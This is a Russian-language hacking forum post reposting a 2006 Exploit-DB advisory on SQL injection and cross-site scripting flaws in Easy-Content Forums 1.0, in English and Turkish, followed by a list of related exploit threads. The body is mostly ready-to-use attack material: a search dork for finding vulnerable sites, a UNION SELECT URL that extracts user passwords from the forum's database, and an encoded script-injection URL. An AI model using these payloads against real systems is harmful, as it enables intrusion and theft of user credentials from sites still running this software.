Exploit Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1834
Проверка EDB
  1. Пройдено
Автор
AJANN
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2006-2697 cve-2006-2696
Дата публикации
2006-05-26
Код: 
ENGLISH
# Title  :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork   :   "Copyright 2004 easy-content forums"
# Author :   ajann
# Exploit;

SQL INJECT.ON--------------------------------------------------------
###  http://[target]/[path]/userview.asp?startletter=SQL TEXT
###  http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------
###  http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X




TURKISH
# Ba.l.k          :   Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama]   :   "powered by phpmydirectory"
# Aç... Bulan     :   ajann
# Aç.k bulunan dosyalar;

SQL INJECT.ON--------------------------------------------------------
###  http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
###  http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken

Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

###  http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.

Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.

# milw0rm.com [2006-05-26]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Easy News Content Management - Database Disclosure
Ответы
0
Просмотры
293
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)
Ответы
0
Просмотры
921
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Local Buffer Overflow (SEH)
Ответы
0
Просмотры
754
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Easy Vedio to PSP Converter 1.6.20 - Local Buffer Overflow (SEH)
Ответы
0
Просмотры
787
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Easy DVD Creator 2.5.11 - Local Buffer Overflow (SEH)
Ответы
0
Просмотры
754
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - Local Buffer Overflow (SEH)
Ответы
0
Просмотры
729
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Easy AVI DivX Converter 1.2.24 - Local Buffer Overflow (SEH)
Ответы
0
Просмотры
758
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin Easy Modal 2.0.17 - SQL Injection
Ответы
0
Просмотры
656
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)
Ответы
0
Просмотры
816
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit EFS Easy Chat Server 3.1 - Remote Buffer Overflow (SEH)
Ответы
0
Просмотры
722
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу